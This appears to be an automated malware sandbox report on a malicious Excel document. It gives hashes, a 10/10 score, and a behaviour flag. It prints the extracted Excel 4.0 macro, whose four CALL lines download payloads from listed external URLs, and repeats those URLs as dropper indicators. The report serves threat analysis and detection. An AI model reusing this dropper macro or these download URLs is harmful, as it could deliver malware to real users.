
General

  • Target: 3c1aea9f7c029c6d1560af5cbd680746b4b99382001485732f28bc770611b103
  • Size: 67KB
  • Sample: 241120-2kplhavbng
  • MD5: 4ca50d67a7178b9c58cdb91b5bff281d
  • SHA1: 47961da73c3aaf70d910251ef4ec507765f59190
  • SHA256: 3c1aea9f7c029c6d1560af5cbd680746b4b99382001485732f28bc770611b103
  • SHA512: c2dca9a8ddcf339f0d08ce8e4d8c0b102a2fac44e9d6983058db343ad169f8e509dec4d7512fb767ae15afaa9dedec18cc8c657d34304b86519b4e327fcb9b7e
  • SSDEEP: 1536:nVKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM+u9s1a6YG2jzQ0viPvDNHhGtg:VKpb8rGYrMPe3q7Q0XV5xtezE8vG8UMI

Score
10/10

Malware Config

Extracted

Language: xlm4.0

Source (extracted Excel 4.0 macro, one formula per line):

=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://www.melisetotoaksesuar.com/catalog/controller/account/dqfKI/", "..\uxevr1.ocx")
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://elamurray.com/athletics-carnival-2018/3UTZYr9D9f/", "..\uxevr2.ocx")
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://masyuk.com/581voyze/MlX/", "..\uxevr3.ocx")
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://jr-software-web.net/aaabackupsqldb/11hYk3bHJ/", "..\uxevr4.ocx")
URLs

xlm40.dropper: https://www.melisetotoaksesuar.com/catalog/controller/account/dqfKI/
xlm40.dropper: http://elamurray.com/athletics-carnival-2018/3UTZYr9D9f/
xlm40.dropper: http://masyuk.com/581voyze/MlX/
xlm40.dropper: http://jr-software-web.net/aaabackupsqldb/11hYk3bHJ/

Targets

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks
